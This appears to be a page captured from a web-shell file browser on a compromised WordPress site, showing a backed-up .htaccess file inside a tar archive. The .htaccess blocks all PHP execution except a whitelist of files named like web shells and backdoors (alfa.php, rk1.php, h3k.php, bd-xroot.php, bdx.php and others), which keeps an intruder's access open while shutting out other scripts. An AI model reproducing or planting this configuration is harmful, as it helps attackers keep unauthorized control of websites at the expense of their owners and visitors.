Submit
Path:
~
/
home
/
contenidosenred
/
public_html
/
OD
/
wp-admin
/
includes
/
219846
/
File Content:
.htaccess.bk.tar
home/contenidosenred/public_html/.well-known/.htaccess.bk 0000644 00000001053 15105422051 0017517 0 ustar 00 <FilesMatch ".*\.(phtml|php|PhP|php5|suspected)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(alfa.php|rk1.php|rk2.php|rk3.php|rk4.php|h3k.php|fox.php|root.php|bd-xroot.php|style-css.php|file-manager.php|style.php|index.php|autoload_classmap.php|style.php|wp-22.php|bdx.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>